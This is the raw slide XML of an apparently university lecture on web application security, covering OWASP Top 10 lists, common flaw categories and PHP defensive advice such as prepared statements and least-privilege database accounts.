              <a:t>https://www.php.net/manual/en/security.database.sql-injection.php </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Never </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>connect to the database as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>superuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> or as the database owner. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>prepared statements with bound </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" smtClean="0"/>
              <a:t>variables.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>if the given input has the expected data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>type.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3688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3600" smtClean="0"/>
              <a:t>(7). Error Handling Problems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="36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mtClean="0"/>
              <a:t>Error conditions that occur during normal operation are not handled properly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" smtClean="0"/>
              <a:t>If an attacker can cause errors to occur that the web application does not handle, they can gain detailed system information, deny service, cause security mechanisms to fail, or crash the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"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043863" cy="1143000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(8). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3600" smtClean="0"/>
              <a:t>Insecure Use of Cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="36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z="2800" smtClean="0"/>
              <a:t>Web applications frequently use cryptographic functions to protect information and credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2800" smtClean="0"/>
              <a:t>These functions and the code to integrate them have proven difficult to code properly, frequently resulting in weak protection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" smtClean="0"/>
              <a:t>E.g. MD5(CreditCardNum, RandomNum)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27987" cy="782638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(9). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3600" smtClean="0"/>
              <a:t>Remote Administration Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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z="2800" smtClean="0"/>
              <a:t>Many web applications allow administrators to access the site using a web interface.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2800" smtClean="0"/>
              <a:t>If these administrative functions are not very carefully protected, an attacker can gain full access to all aspects of a site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="28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(10). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="3600" smtClean="0"/>
              <a:t>Web and Application Server Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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mtClean="0"/>
              <a:t>Having a strong server configuration standard is critical to a secure web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" smtClean="0"/>
              <a:t>These servers have many configuration options that affect security and are not secure out of the box.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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OWASP</a:t>
            </a:r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Open Web Application Security Project (OWASP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/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OWASP Top-Ten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800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720055"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0"/>
              <a:t>Top 10 Web Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Risks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5" y="1268760"/>
            <a:ext cx="7488832" cy="4392612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="444500" indent="-444500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean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3"/>
              </a:rPr>
              <a:t>Broken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean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4"/>
              </a:rPr>
              <a:t>Sensitive Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Exposure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean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5"/>
              </a:rPr>
              <a:t>XML External Entities (XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty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6"/>
              </a:rPr>
              <a:t>Broken Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty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7"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean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8"/>
              </a:rPr>
              <a:t>Cross-Site Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean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9"/>
              </a:rPr>
              <a:t>Insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean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10"/>
              </a:rPr>
              <a:t>Using Components with Known </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" indent="-444500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Insufficient Logging &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Monitoring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930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559675" cy="935038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>十大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>資安漏洞列表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424863" cy="4175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200" b="1" smtClean="0"/>
              <a:t>A1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>跨站腳本攻擊 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>(Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>，簡稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>注入缺失</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>(Injection Flaw)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>惡意檔案執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>(Malicious File Execution)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>不安全的物件參考</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>(Insecure Direct Object Reference) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>跨網站的偽造要求 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>(Cross-Site Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>，簡稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>CSRF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>資訊揭露與不適當錯誤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>遭破壞的鑑別與連線管理 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>不安全的密碼儲存器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>不安全的通訊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>(Insecure Communication)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>A10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>疏於限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
              <a:t>存取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" b="1" smtClean="0"/>
              <a:t>(Failure to Restrict URL Access)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2200" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="文字方塊 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="5805488"/>
            <a:ext cx="350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Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>資料來源：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>台灣分會</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="20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latin typeface="Arial" charset="0"/>
              <a:ea typeface="新細明體" charset="-12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矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="6237288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OWASP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Open Web Application Security Project </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" b="1">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="新細明體" charset="-120"/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6151" name="文字方塊 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7164388" y="836613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  <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(2007)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="1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6275388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4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="250825" y="6092825"/>
            <a:ext cx="864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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf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228600"/>
            <a:ext cx="7864475" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="0" smtClean="0"/>
              <a:t>The Ten Most Critical Web Application Security Vulnerabilities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614488"/>
            <a:ext cx="7856537" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="471488" indent="-4714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zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Unvalidated Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-4714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zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Broken Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-4714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zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Broken Account and Session Management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-4714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zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-4714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zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Buffer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-471488" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Command Injection Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-471488" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Error Handling Problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-471488" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Insecure Use of Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-471488" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Remote Administration Flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="471488" indent="-471488" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="2600" b="1" smtClean="0"/>
              <a:t>Web and Application Server Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2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altLang="zh-TW" sz="3600" smtClean="0"/>
              <a:t>(1). Unvalidated Parameters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en-US" altLang="zh-TW" smtClean="0"/>
              <a:t> Information from web requests is not validated before being used by a web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Attackers can use these flaws to attack background components through a web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zh-TW" altLang="zh-TW" smtClean="0"/>
              <a:t>(2). Broken Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" smtClean="0"/>
              <a:t>Restrictions on what authenticated users are allowed to do are not properly enforced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" smtClean="0"/>
              <a:t>Attackers can exploit these flaws to access other users' accounts, view sensitive files, or use unauthorized functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW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71550" y="4818063"/>
            <a:ext cx="70739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chemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>http://www.citibank.com/print.asp?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>u1257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NU簡報9">
  <a:themeElements>
    <a:clrScheme name="NCNU簡報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NU簡報9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NU簡報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NCNU行政大樓</Template>
  <TotalTime>563</TotalTime>
  <Words>1107</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小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NCNU簡報9</vt:lpstr>
      <vt:lpstr>點陣圖影像</vt:lpstr>
      <vt:lpstr>WWW安全</vt:lpstr>
      <vt:lpstr>WWW安全</vt:lpstr>
      <vt:lpstr>OWASP</vt:lpstr>
      <vt:lpstr>Top 10 Web Application Security Risks</vt:lpstr>
      <vt:lpstr>十大Web資安漏洞列表</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr> The Ten Most Critical Web Application Security Vulnerabilities</vt:lpstr>
      <vt:lpstr>(1). Unvalidated Parameters</vt:lpstr>
      <vt:lpstr>(2). Broken Access Control</vt:lpstr>
      <vt:lpstr>(3). Broken Account and Session Management</vt:lpstr>
      <vt:lpstr>(4). Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS Example</vt:lpstr>
      <vt:lpstr>XSS Web Application Hijack Scenario</vt:lpstr>
      <vt:lpstr>使用htmlspecialchars() 防範XSS</vt:lpstr>
      <vt:lpstr>XSS Prevention Rules</vt:lpstr>
      <vt:lpstr>(5). Buffer Overflows</vt:lpstr>
      <vt:lpstr>(6). Command Injection Flaws</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>使用mysqli_real_escape_string() 避免SQL Injection</vt:lpstr>
      <vt:lpstr>使用regular expression限制輸入字元</vt:lpstr>
      <vt:lpstr>Security advice in PHP.net</vt:lpstr>
      <vt:lpstr>(7). Error Handling Problems</vt:lpstr>
      <vt:lpstr>(8). Insecure Use of Cryptography</vt:lpstr>
      <vt:lpstr>(9). Remote Administration Flaws</vt:lpstr>
      <vt:lpstr>(10). Web and Application Server Misconfiguration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企業網站服務之建置與管理</dc:title>
  <dc:creator>Yen-Cheng Chen</dc:creator>
  <cp:lastModifiedBy>yccncnu</cp:lastModifiedBy>
